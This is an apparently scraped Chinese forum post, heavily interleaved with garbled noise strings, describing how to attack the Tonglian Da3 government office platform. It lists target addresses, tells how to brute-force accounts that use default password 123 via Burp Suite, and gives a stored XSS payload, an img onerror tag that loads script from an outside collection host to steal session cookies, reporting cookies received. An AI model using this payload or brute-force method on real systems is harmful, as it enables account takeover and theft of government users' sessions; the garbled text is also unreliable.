F o2 m" K. P# I, l
3 n; [ C, Z. A
同联Da3协同办公平台后台通用储存型xss漏洞+ h6 Y! c' W8 @3 C% P' z/ d3 Q: r+ |
) p: P- _4 p9 a) e, K
" |$ o" S2 E" T 平台简介:6 Z! l, I' u3 A5 r/ N6 V6 W1 j
3 _, \, u, H' m
5 }7 [1 ` X7 o# s/ A
- [% C8 n6 {" K3 f3 f
; P V5 [ @! ?; W" ], Z5 [
* C5 S% Y; y7 J1 C 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
5 t5 n* \; q3 h# q# t+ \& l; r
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
$ L$ ]) K! B( E2 S; V
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!' h& W8 \. T6 t* w9 [( I' {
! y. l4 b r' ] 8 ]; {! K! k {4 Q/ q
) C( q. E7 |( C4 Y2 l
/ I0 q$ T7 ^0 e* ?6 N' N! e
; T' E/ p7 ?. [, {
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
1 v) l: ]+ D7 `8 M) ?; S/ p
5 b6 P- e8 m/ D8 R0 d, O
1 x- g3 I! u( J! F( ~! p3 c
, |3 f; E! L M4 Z" X+ E- k% _ L
/ ^# j% b2 I+ [3 M( E
3 M4 I( Z1 L! ?. _ http://1.1.1.1:7197/cap-aco/#(案例2-)
5 z$ _% |. u! ?4 U. C" |
& T. Q7 b7 W9 c, r# m + v( ^& P9 @% m* h' O7 ~9 }
http://www.XXOO.com (案例1-官网网站)
+ _" t6 n# k. L2 N' Q% q
7 V* W. w& R7 O& ` ( D! p, p$ X% h8 l& h: H0 k% N, Z
漏洞详情:
! I B# L' A$ f! {
, j, b' r8 M+ z7 ~ ! i# y8 v- B0 Z6 C8 r7 G! t
案例一、
& E8 M& X' l" q R
6 k' z1 A3 o) b5 A0 o! D
3 H" U. f# }0 j: O) T* h 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试' [ z4 ~( y' I9 t, n5 e) A
5 w7 p- {+ J, ~& T2 E ' \. e, H0 s; {& A$ u8 H
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:" D) @0 `% ^! _6 ]: s
" s- r& Z+ H P d3 o
& V* J- S1 ]' i5 ]8 A# q s: h. m
& H) G( ~$ [* N4 z! T* s
0 M1 D( h0 R6 E+ j7 I |
0 A* a0 u4 l/ Q2 a+ D
% ?; X2 a, c! ]/ x. [% P( v
4 R9 L/ i/ O- C$ ~4 E; e2 b
) ~3 t1 G b8 | status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: 6 O" V9 u, t, }/ {9 I6 I/ J; A
7 E. _0 G1 y* x3 N( ?2 B: s. E
: q8 O4 h# U4 \+ b# N+ J& g ( i M+ b( I" f+ t. c# X
7 O- x' k0 p% [+ I' W* f4 k
' c2 x/ S+ u' P
. @* N4 a7 \* ?
5 l% |! K2 D" z! C
% y2 M+ @$ s9 f, i. J
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 " |& O7 i- j( k) w, ^
5 p+ H- W* E$ `. O' H' u ; G" {) e" Y" `& B
6 D5 X) c0 p6 K6 Z4 x! J! F3 {0 H
" m" j: |# ~3 [9 D0 b! V" i % U' J6 `: P" A, d
<img src=x5 x: K. i# T* |
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: i- P* I. _7 x+ ~
1 K5 F5 k* y: S6 Y
. j) G( P' M$ X* {7 Q" b$ K
: s4 F) P I4 A% [6 L: |
% x |2 a" J% g ' K+ ~5 ~! A6 X
然后发送,接收cookie如图: . u7 ?; v/ D6 \ Z$ k7 ^: O
1 f, g* L3 x2 g $ z/ n) f: ]! Y5 _
O/ O/ `. M6 m( L- }% u U
. j# H1 s5 p* { y % j4 F9 m) v* a& k* @+ s, A+ ?; `
' W; w9 F! \3 B9 L% P, a( Z. y' n/ S
2 a2 e8 s0 u c) V( d " u1 G9 @8 D+ @8 Q( j$ X
6 Q: \* n0 N* @/ l
+ w) D9 N! V: X0 j, Q1 E5 P
- k4 {$ E0 @/ p; R0 Q
- t. m1 x# u# l* U
- G6 {8 i# R% t/ G! l
' ~+ X0 f* o/ S+ X" x# v% o$ P" S0 v
. e' b3 A3 ~' c" s* Z5 |$ t+ p; H
/ M& _6 H/ J/ R( e
& s; m+ p1 [9 w2 t7 `1 O
1 ~ U) M# C1 n
9 F" l8 n/ L% Z4 D ( V' [6 R# ^5 A( e* T9 n
$ _3 l# Z6 \4 ?& Z& ~
: u/ B0 o' A- w8 V2 p+ w) O 7 M u% p" l# q" y- M5 h
案例2、 ( X+ n# G2 j! s+ z
. o1 i: U/ X7 h* g# {
, d0 p, V% L A/ L% a3 ]4 e |+ T+ u 前面步骤都一样,下面看效果图:
: u* T8 r: f8 z- B5 u" R
7 @9 T* Y) h6 z% U$ q
. D1 v M0 v' h7 q! K: \0 `9 A
$ a! L% u3 X1 I0 Y5 x
4 V9 V* f+ `- M5 m8 s( y
; [$ h( p- _5 | G, ]$ T/ A! P3 T
+ s( U4 s- Q6 y+ ^; P: V
6 ~2 @' Z! {2 f5 g, O9 q. u + ?0 U+ N5 `) P! o6 S
# p" C3 E! O5 H" x. @: P e0 g8 _ k
) `! A, t: k0 F: g4 }8 X 1 P8 y, O1 h0 @, _: P
; f, ^8 Q" T! s+ C0 t, u% O8 C
$ k7 V, d4 p# z$ U2 U4 M" w " {$ \+ |+ M* B1 B% k* ?
( ?! g0 ^8 Y. u! f7 t
: U0 q, d( D: L* A8 c8 [. \/ J % ]6 @+ o) `# M' l* {1 l8 y. a2 I
6 A. y3 ~6 U" f' w1 @* D4 d2 ?7 @
2 P; P; g' Y8 }1 N 3 l. p8 N4 d( n$ M
4 d7 n3 L3 x' v3 S0 k% O. C
- {9 j& T4 w1 B! |4 b
* |: |3 ]; c5 j- [ F8 r 9 Y4 g% Z/ b2 u) u$ `+ J& q7 F/ m# R
! S& X' X8 `8 O% n2 s
; M9 ?, I. y. C
v) C$ m$ ~( _& b% q6 N$ `
& W) D$ ^+ V8 N0 d